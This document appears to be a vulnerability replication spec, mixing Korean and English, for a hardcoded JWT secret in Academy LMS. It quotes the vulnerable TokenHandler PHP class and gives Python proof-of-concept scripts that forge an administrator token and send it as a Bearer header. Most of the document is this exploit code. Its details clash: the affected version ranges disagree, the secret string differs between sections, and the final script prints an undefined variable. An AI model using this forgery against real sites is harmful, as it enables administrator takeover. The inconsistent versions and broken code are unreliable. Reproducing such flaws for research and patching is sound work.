Replication Environment Tech Spec
대상 소프트웨어(Target Application Specification)
- 제품명/버전 :
- Academy LMS v5.13 이하(포함된 취약 코드가 확인된 버전)
- 패치버전 : v6.15 이상 / v6.14 이하는 다 영향 받음
- PHP 기반 (Creativeitem)
- 배포 방식 : 유료라... 구축해야함
시스템 환경(System Environment)
- 최소 PHP / MySQL 버전: PHP > 7.0, MySQL > 5.7.0 (Creativeitem)
이 외 필요한 조건
1. 취약점 발견된 소스 코드 (source)
// From lms/application/libraries/TokenHandler.php:6
class TokenHandler
{
//////////The function generate token/////////////
PRIVATE $key = "academy-lms-xxxxxxxx";
public function GenerateToken($data)
{
$jwt = JWT::encode($data, $this->key);
return $jwt;
}
//////This function decode the token////////////////////
public function DecodeToken($token)
{
$decoded = JWT::decode($token, $this->key, array('HS256'));
$decodedData = (array) $decoded;
return $decodedData;
}
}
2. PoC
import jwt
import json
# Known default secret from Academy LMS
secret = "academy-lms-xxxxxx"
# Forge admin token
payload = {
"user_id": "1",
"role_id": "1",
"is_admin": True,
"email": "admin@example.com"
}
# Generate malicious JWT
forged_token = jwt.encode(payload, secret, algorithm='HS256')
print(f"Forged Admin Token: {forged_token}")
3. pseudo-code
payload
{
"user_id": 1,
"role_id": 1,
"is_admin": true,
"email": "[email protected]"
}
Signing JWT(Attacker)
forged_token = JWT.encode(
malicious_payload,
hardcoded_secret,
algorithm="HS256" )
Reflection of the above
import jwt
import datetime
# Known default secret from Academy LMS
secret_key = "academy-lms-hardcoded-vulnerable"
# Forge admin token
# payload made by attacker (관리자 권한)
payload = {
"user_id": 1,
"role_id": 1,
"is_admin": True,
"email": "[email protected]",
"exp": datetime.datetime.utcnow() + datetime.timedelta(hours=5)
}
# Generate malicious JWT (by attacker)
malicious_token = jwt.encode(payload, secret_key, algorithm="HS256")
print(f"Forged Admin Token: {forged_token}")
print(malicious_token)
# 해당 토큰을 HTTP 요청에 사용
# Authorization: Bearer <malicious_token>